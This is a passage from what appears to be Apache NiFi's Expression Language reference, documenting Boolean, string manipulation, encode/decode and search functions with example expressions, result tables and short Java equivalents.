):and(\n\t${filename:length():ge(5)}\n)}\n-----------------------------------------------\n\n\n\n\n\n[.function]\n=== or\n\n*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject\n\tor the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. 
If\n\teither the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if\n\tthe filename is all lower-case.\n----------------------------------------------\n${filename:toLower():equals( ${filename} ):or(\n\t${filename:length():equals(5)}\n)}\n----------------------------------------------\n\n\n\n[.function]\n=== not\n\n[.description]\n*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#\n\n[.subject]\n*Subject Type*: [.subject]#Boolean#\n\n[.arguments]\n*Arguments*: No arguments\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*: We can invert the value of another function by using the `not` function, as\n\t`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to\n\t\"hello.txt\" and will return `false` if the filename is \"hello.txt.\"\n\n\n\n[.function]\n=== ifElse\n\n*Description*: [.description]#Evaluates the first argument if the Subject evaluates to `true`, or the second argument\nif the Subject evaluates to `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_EvaluateIfTrue_# : [.argDesc]#The value to return if the Subject is true#\n\t- [.argName]#_EvaluateIfFalse_# : [.argDesc]#The value to return if the Subject is false#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", the \"nullFilename\" attribute has\nthe value null, and the \"bool\" attribute has the value \"true\", then the following expressions will provide\nthe following results:\n\n\n\n.ifElse Examples\n|===================================================================\n| Expression | Value\n| `${bool:ifElse('a','b')}` | `a`\n| `${literal(true):ifElse('a','b')}` | `a`\n| `${nullFilename:isNull():ifElse('file does not exist', 'located file')}` | `file does not exist`\n| `${nullFilename:ifElse('found', 'not_found')}` | `not_found`\n| `${filename:ifElse('found', 'not_found')}` | `not_found`\n| `${filename:isNull():not():ifElse('found', 'not_found')}` | `found`\n|===================================================================\n\n\n\n\n[[strings]]\n== String Manipulation\n\nEach of the following functions manipulates a String in some way.\n\n\n\n\n[.function]\n=== toUpper\n\n*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it\n\treplaces any lowercase letter with the uppercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"abc123.txt\", then the Expression `${filename:toUpper()}`\n\twill return \"ABC123.TXT\"\n\n\n\n\n\n[.function]\n=== toLower\n\n*Description*: [.description]#This function converts the Subject into an all lower-case String. 
Said another way,\n\tit replaces any uppercase letter with the lowercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"ABC123.TXT\", then the Expression `${filename:toLower()}`\n\twill return \"abc123.txt\"\n\n\n\n\n\n[.function]\n=== trim\n\n*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute `attr` has the value \" 1 2 3 \", then the Expression `${attr:trim()}` will\n\treturn the value \"1 2 3\".\n\n\n\n\n[.function]\n=== substring\n\n*Description*:\n[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.\n\tIf the _ending index_ is not supplied, it will return the portion of the Subject starting at the given\n\t'start index' and ending at the end of the Subject value.#\n\n[.description]#The _starting index_ and _ending index_ are zero-based. That is, the first character is referenced by using\n\tthe value `0`, not `1`.#\n\n[.description]#If either the _starting index_ is or the _ending index_ is not a number, this function call will result\n\tin an error.#\n\n[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#\n\n[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value\n\tless than 0, this function call will result in an error.#\n\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#\n\t- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*:\n\nIf we have an attribute named \"filename\" with the value \"a brand new filename.txt\",\nthen the following Expressions will result in the following values:\n\n.Substring Examples\n|================================================================\n| Expression | Value\n| `${filename:substring(0,1)}` | `a`\n| `${filename:substring(2)}` | `brand new filename.txt`\n| `${filename:substring(12)}` | `filename.txt`\n| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`\n|================================================================\n\n\n\n\n[.function]\n=== substringBefore\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the first occurrence of the argument. 
If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringBefore Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringBefore('.')}` | `a brand new filename`\n| `${filename:substringBefore(' ')}` | `a`\n| `${filename:substringBefore(' n')}` | `a brand`\n| `${filename:substringBefore('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringBeforeLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the last occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringBeforeLast Examples\n|==========================================================================\n| Expression | Value\n| `${filename:substringBeforeLast('.')}` | `a brand new filename`\n| `${filename:substringBeforeLast(' ')}` | `a brand new`\n| `${filename:substringBeforeLast(' n')}` | `a brand`\n| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`\n|==========================================================================\n\n\n\n\n\n\n[.function]\n=== substringAfter\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe first occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfter Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringAfter('.')}` | `txt`\n| `${filename:substringAfter(' ')}` | `brand new filename.txt`\n| `${filename:substringAfter(' n')}` | `ew filename.txt`\n| `${filename:substringAfter('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringAfterLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe last occurrence of the argument and extending to the end of the Subject. 
If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfterLast Examples\n|=========================================================================\n| Expression | Value\n| `${filename:substringAfterLast('.')}` | `txt`\n| `${filename:substringAfterLast(' ')}` | `filename.txt`\n| `${filename:substringAfterLast(' n')}` | `ew filename.txt`\n| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`\n|=========================================================================\n\n\n\n\n[.function]\n=== getDelimitedField\n\n*Description*: [.description]#Parses the Subject as a delimited line of text and returns just a single field\n\tfrom that delimited text.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_index_# : [.argDesc]#The index of the field to return. A value of 1 will return the first field,\n\t\ta value of 2 will return the second field, and so on.#\n\t- [.argName]#_delimiter_# : [.argDesc]#Optional argument that provides the character to use as a field separator.\n\t\tIf not specified, a comma will be used. This value must be exactly 1 character.#\n\t- [.argName]#_quoteChar_# : [.argDesc]#Optional argument that provides the character that can be used to quote values\n\t\tso that the delimiter can be used within a single field. If not specified, a double-quote (\") will be used. This value\n\t\tmust be exactly 1 character.#\n\t- [.argName]#_escapeChar_# : [.argDesc]#Optional argument that provides the character that can be used to escape the Quote Character\n\t or the Delimiter within a field. If not specified, a backslash (\\) is used. This value must be exactly 1 character.#\n\t- [.argName]#_stripChars_# : [.argDesc]#Optional argument that specifies whether or not quote characters and escape characters should\n\t be stripped. For example, if we have a field value \"1, 2, 3\" and this value is true, we will get the value `1, 2, 3`, but if this\n\t value is false, we will get the value `\"1, 2, 3\"` with the quotes. The default value is false. This value must be either `true`\n\t or `false`.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"line\" attribute contains the value _\"Jacobson, John\", 32, Mr._\n\tand the \"altLine\" attribute contains the value _Jacobson, John|32|Mr._\n then the following Expressions will result in the following values:\n\n.GetDelimitedField Examples\n|======================================================================\n| Expression | Value\n| `${line:getDelimitedField(2)}` | _(space)_32\n| `${line:getDelimitedField(2):trim()}` | 32\n| `${line:getDelimitedField(1)}` | \"Jacobson, John\"\n| `${line:getDelimitedField(1, ',', '\"', '\\\\', true)}` | Jacobson, John\n| `${altLine:getDelimitedField(1, '\\|')}` | Jacobson, John\n|======================================================================\n\n\n\n[.function]\n=== append\n\n*Description*: [.description]#The `append` function returns the result of appending the argument to the value of\n\tthe Subject. 
If the Subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:append('.gz')}` will return \"a brand new filename.txt.gz\".\n\n\n\n\n\n[.function]\n=== prepend\n\n*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of\n\tthe Subject. If the subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#\n\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"filename.txt\", then the Expression\n\t`${filename:prepend('a brand new ')}` will return \"a brand new filename.txt\".\n\n\n\n\n\n[.function]\n=== replace\n\n*Description*: [.description]#Replaces *all* occurrences of one literal String within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.Replace Examples\n|===================================================================\n| Expression | Value\n| `${filename:replace('.', '_')}` | `a brand new filename_txt`\n| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`\n| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replace('filename', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceFirst\n\n*Description*: [.description]#Replaces *the first* occurrence of one literal String or regular expression within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String (literal or regular expression pattern) to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.ReplaceFirst Examples\n|===================================================================\n| Expression | Value\n| `${filename:replaceFirst('a', 'the')}` | `the brand new filename.txt`\n| `${filename:replaceFirst('[br]', 'g')}` | `a grand new filename.txt`\n| `${filename:replaceFirst('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceFirst('\\w{8}', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceAll\n\n*Description*: [.description]#The `replaceAll` function takes two String arguments: a literal String or Regular Expression (NiFi uses the Java Pattern\n\tsyntax), and a replacement string. 
The return value is the result of substituting the replacement string for\n\tall patterns within the Subject that match the Regular Expression.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#he Regular Expression (in Java syntax) to match in the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. If the _regular expression_\n\t\targument uses Capturing Groups, back references are allowed in the _replacement_.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.ReplaceAll Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:replaceAll('\\..*', '')}` | `a brand new filename`\n| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`\n| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== replaceNull\n\n*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#\n\n*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:replaceNull('abc')}` will return\n\t\"a brand new filename.txt\", while `${hello:replaceNull('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== replaceEmpty\n\n*Description*: [.description]#The `replaceEmpty` function returns the argument if the Subject is null or\n\tif the Subject consists only of white space (new line, carriage return, tab, space). Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null or empty.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" has the value \" \", then the Expression `${filename:replaceEmpty('abc')}` will return\n\t\"a brand new filename.txt\", while `${hello:replaceEmpty('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== length\n\n*Description*: [.description]#Returns the length of the Subject#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"filename\" has a value of \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`\n\twill return 0.\n\n\n[[encode]]\n== Encode\/Decode Functions\n\nEach of the following functions will encode a string according the rules of the given data format.\n\n\n\n\n[.function]\n=== escapeJson\n\n*Description*: [.description]#This function prepares the Subject to be inserted into JSON document by escaping the characters\n in the String using Json String rules. 
[[encode]]\n== Encode\/Decode Functions\n\nEach of the following functions will encode a string according to the rules of the given data format.\n\n\n\n\n[.function]\n=== escapeJson\n\n*Description*: [.description]#This function prepares the Subject to be inserted into a JSON document by escaping the characters\n in the String using JSON String rules. The function correctly escapes quotes and control-chars (tab, backslash,\n cr, ff, etc.)#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'He didn't say, \"Stop!\"', then the Expression `${message:escapeJson()}`\n will return 'He didn't say, \\\"Stop!\\\"'\n\n\n\n\n[.function]\n=== escapeXml\n\n*Description*: [.description]#This function prepares the Subject to be inserted into an XML document by escaping the characters\n in a String using XML entities. The function correctly escapes quotes, apostrophe, ampersand, <, > and\n control-chars.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeXml()}`\n will return '&quot;bread&quot; &amp; &quot;butter&quot;'\n\n\n\n\n[.function]\n=== escapeCsv\n\n*Description*: [.description]#This function prepares the Subject to be inserted into a CSV document by escaping the characters\n in a String using the rules in RFC 4180. The function correctly escapes quotes and surrounds the string in quotes if needed.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'But finally, she left', then the Expression `${message:escapeCsv()}`\n will return '\"But finally, she left\"'\n\n\n\n\n[.function]\n=== escapeHtml3\n\n*Description*: [.description]#This function prepares the Subject to be inserted into an HTML document by escaping the characters\n in a String using HTML entities. Supports only the HTML 3.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeHtml3()}`\n will return '&quot;bread&quot; &amp; &quot;butter&quot;'\n\n\n\n\n[.function]\n=== escapeHtml4\n\n*Description*: [.description]#This function prepares the Subject to be inserted into an HTML document by escaping the characters\n in a String using HTML entities. Supports all known HTML 4.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeHtml4()}`\n will return '&quot;bread&quot; &amp; &quot;butter&quot;'\n\n\n\n\n[.function]\n=== unescapeJson\n\n*Description*: [.description]#This function unescapes any JSON literals found in the String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'He didn't say, \\\"Stop!\\\"', then the Expression `${message:unescapeJson()}`\n will return 'He didn't say, \"Stop!\"'\n\n\n\n\n[.function]\n=== unescapeXml\n\n*Description*: [.description]#This function unescapes a string containing XML entity escapes to a string containing the\n actual Unicode characters corresponding to the escapes. 
Supports only the five basic XML entities (gt, lt,\n quot, amp, apos).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '&quot;bread&quot; &amp; &quot;butter&quot;', then the Expression `${message:unescapeXml()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== unescapeCsv\n\n*Description*: [.description]#This function unescapes a String from a CSV document according to the rules of RFC 4180.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"But finally, she left\"', then the Expression `${message:unescapeCsv()}`\n will return 'But finally, she left'\n\n\n\n\n[.function]\n=== unescapeHtml3\n\n*Description*: [.description]#This function unescapes a string containing HTML 3 entities to a string containing the\n actual Unicode characters corresponding to the escapes. Supports only HTML 3.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '&quot;bread&quot; &amp; &quot;butter&quot;', then the Expression `${message:unescapeHtml3()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== unescapeHtml4\n\n*Description*: [.description]#This function unescapes a string containing HTML 4 entities to a string containing the\n actual Unicode characters corresponding to the escapes. Supports all known HTML 4.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '&quot;bread&quot; &amp; &quot;butter&quot;', then the Expression `${message:unescapeHtml4()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== urlEncode\n\n*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an\n\tattribute value to indicate the URL of a website.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can URL-Encode an attribute named \"url\" by using the Expression `${url:urlEncode()}`. If\n\tthe value of the \"url\" attribute is \"https:\/\/nifi.apache.org\/some value with spaces\", this\n\tExpression will then return \"https:\/\/nifi.apache.org\/some%20value%20with%20spaces\".\n\n\n\n\n[.function]\n=== urlDecode\n\n*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a URL-Encoded attribute named \"url\" with the value\n\t\"https:\/\/nifi.apache.org\/some%20value%20with%20spaces\", then the Expression\n\t`${url:urlDecode()}` will return \"https:\/\/nifi.apache.org\/some value with spaces\".\n\n\n\n
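These encode\/decode functions line up with standard Java utilities, which can be handy for sanity-checking values outside of NiFi. A minimal, illustrative Java sketch follows (hypothetical class name; not NiFi's implementation). Note that `java.net.URLEncoder` performs form encoding and writes spaces as `+`, whereas the `urlEncode()` example above produces `%20`:\n\n[source,java]\n----\nimport java.net.URLDecoder;\nimport java.net.URLEncoder;\nimport java.nio.charset.StandardCharsets;\nimport java.util.Base64;\n\npublic class CodecDemo {\n    public static void main(String[] args) throws Exception {\n        \/\/ Base64, as used by the base64Encode \/ base64Decode functions described next\n        String payload = \"admin:admin\";\n        String b64 = Base64.getEncoder().encodeToString(payload.getBytes(StandardCharsets.UTF_8));\n        System.out.println(b64);                                     \/\/ YWRtaW46YWRtaW4=\n        System.out.println(new String(Base64.getDecoder().decode(b64),\n                StandardCharsets.UTF_8));                            \/\/ admin:admin\n\n        \/\/ URL encoding; spaces become '+' here rather than '%20'\n        String encoded = URLEncoder.encode(\"some value with spaces\", \"UTF-8\");\n        System.out.println(encoded);                                 \/\/ some+value+with+spaces\n        System.out.println(URLDecoder.decode(encoded, \"UTF-8\"));     \/\/ some value with spaces\n    }\n}\n----\n\n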
[.function]\n=== base64Encode\n\n*Description*: [.description]#Returns a Base64 encoded string. This is useful for being able to transfer binary data as ASCII.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can Base64-encode an attribute named \"payload\" by using the Expression\n\t `${payload:base64Encode()}`. If the attribute payload had a value of \"admin:admin\",\n\t then the Expression `${payload:base64Encode()}` will return \"YWRtaW46YWRtaW4=\".\n\n\n\n\n[.function]\n=== base64Decode\n\n*Description*: [.description]#Reverses the Base64 encoding on a given string.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a Base64-Encoded attribute named \"payload\" with the value\n\t\"YWRtaW46YWRtaW4=\", then the Expression\n\t`${payload:base64Decode()}` will return \"admin:admin\".\n\n\n\n[[searching]]\n== Searching\n\nEach of the following functions is used to search its subject for some value.\n\n\n[.function]\n=== startsWith\n\n*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will\n\treturn `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.\n\n\n\n\n\n[.function]\n=== endsWith\n\n*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will\n\treturn `false`. `${filename:toUpper():endsWith('TXT')}` returns `true`.\n\n\n\n\n\n[.function]\n=== contains\n\n*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will\n\treturn `false`. `${filename:toUpper():contains('NEW')}` returns `true`.\n\n\n\n\n\n[.function]\n=== in\n\n*Description*: [.description]#Returns `true` if the Subject matches one of the provided arguments.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value1_# : [.argDesc]#First possible matching value#\n\t- [.argName]#_valueN_# : [.argDesc]#Nth possible matching value#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"myEnum\" attribute has the value \"JOHN\", then the Expression\n\t`${myEnum:in(\"PAUL\", \"JOHN\", \"MIKE\")}` will return `true`. 
`${myEnum:in(\"RED\", \"GREEN\", \"BLUE\")}` will\n\treturn `false`.\n\n\n\n\n\n[.function]\n=== find\n\n*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the\n\tRegular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.find Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`\n| `${filename:find('Brand.*')}` | `false`\n| `${filename:find('brand')}` | `true`\n|=======================================================================================\n\n\n\n\n\n[.function]\n=== matches\n\n*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.matches Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:matches('a.*txt')}` | `true`\n| `${filename:matches('brand')}` | `false`\n| `${filename:matches('.+brand.+')}` | `true`\n|=======================================================================================\n\n\n\n\n[.function]\n=== indexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *first* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.indexOf Examples\n|===============================================\n| Expression | Value\n| `${filename:indexOf('a.*txt')}` | `-1`\n| `${filename:indexOf('.')}` | `20`\n| `${filename:indexOf('a')}` | `0`\n| `${filename:indexOf(' ')}` | `1`\n|===============================================\n\n\n\n
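Because `find` and `matches` use the Java Pattern syntax while `indexOf` and `lastIndexOf` (described next) perform literal searches, their behavior mirrors familiar Java methods. A short, illustrative Java sketch (hypothetical class name) that reproduces rows from the tables above:\n\n[source,java]\n----\npublic class SearchDemo {\n    public static void main(String[] args) {\n        String filename = \"a brand new filename.txt\";\n\n        \/\/ matches() must cover the whole subject; find() only needs a hit somewhere\n        System.out.println(filename.matches(\"a.*txt\"));    \/\/ true,  like ${filename:matches('a.*txt')}\n        System.out.println(filename.matches(\"brand\"));     \/\/ false, like ${filename:matches('brand')}\n        System.out.println(java.util.regex.Pattern.compile(\"brand\")\n                .matcher(filename).find());                \/\/ true,  like ${filename:find('brand')}\n\n        \/\/ indexOf\/lastIndexOf are literal (non-regex) searches, zero-based\n        System.out.println(filename.indexOf(\"a.*txt\"));    \/\/ -1 (treated literally, not as a regex)\n        System.out.println(filename.indexOf('.'));         \/\/ 20\n        System.out.println(filename.lastIndexOf('a'));     \/\/ 17\n    }\n}\n----\n\n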
